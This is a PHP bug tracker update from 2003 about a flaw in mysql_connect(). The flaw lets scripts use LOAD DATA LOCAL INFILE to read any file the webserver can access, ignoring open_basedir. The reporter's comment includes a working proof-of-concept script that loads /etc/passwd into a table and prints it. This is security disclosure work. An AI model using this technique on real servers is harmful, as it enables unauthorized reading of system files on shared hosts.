ID: 23779
Updated by: georg@php.net
Reported By: php at jkt dot wz dot cz
Status: Open
Bug Type: MySQL related
Operating System: any
PHP Version: 4.3.1
-Assigned To:
+Assigned To: georg
New Comment:
Hmm..
...assigned to myself
Previous Comments:
------------------------------------------------------------------------
[2003-05-27 02:53:25] php at jkt dot wz dot cz
a) not security hole in mysql, it's problem of php
b) you don't need file privileges for 'load data local infile'
solution:
add php.ini option mysql_local_infile;
in mysql_connect() check for 128 and if not enabled, clear it (ie.
option&0x7f)
------------------------------------------------------------------------
[2003-05-24 01:34:19] georg@php.net
It's not a security hole. This only works when the
connected user has file privileges.
------------------------------------------------------------------------
[2003-05-23 19:10:18] sniper@php.net
After a bit more thinking, this is not really PHP problem
to solve, it's a security hole in Mysql..
------------------------------------------------------------------------
[2003-05-23 19:02:30] sniper@php.net
Only solution I can think of is to deny the use of
MYSQL_OPT_LOCAL_INFILE either totally or just when safe-mode is
enabled..
------------------------------------------------------------------------
[2003-05-23 08:49:44] php at jkt dot wz dot cz
i'm using php/4.3.0 (i haven't access to newer version), mysql/3.23.49
or 4.0.11-gamma; i haven't noticed any changes in cvs changelog
[http://cvs.php.net/co.php/php4/ChangeLog?login=2&r=1.1323]
if you made a connection with mysql_connect() and specify 128 as fifth
parameter (options), you can perform sql LOAD DATA LOCAL INFILE
statements. the file accesses are made by mysql client library, so you
can access any file which webserver process can access to, IGNORING
open_basedir option! (and perhaps also safe-mode uid/gid checks, i
don't know...)
test script:
$user='**';
$pass='**';
$host='**';
$db='**';
$table='files';
$filename='/etc/passwd';
$line_term='-----------[line_terminator]------------';
$m=mysql_connect($host, $user, $pass, false, 128);
// connect with MYSQL_OPT_LOCAL_INFILE (in php manual undocumented)
option
mysql_select_db($db, $m);
mysql_query("create table if not exists $table (str text not null)",
$m);
// create our table
mysql_query('load data local infile
"'.mysql_escape_string($filename).'" into table '.$table.' lines
terminated by "'.mysql_escape_string($line_term).'"');
// upload file
echo "ok, upload success ;-)\n";
$res=mysql_query("select * from $table", $m);
// verify & display
echo '<pre>';
while($line=mysql_fetch_assoc($res)) {
echo htmlspecialchars($line['str']);
}
echo '</pre>';
mysql_query('truncate table '.$table, $m);
echo 'have a nice day...';
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=23779&edit=1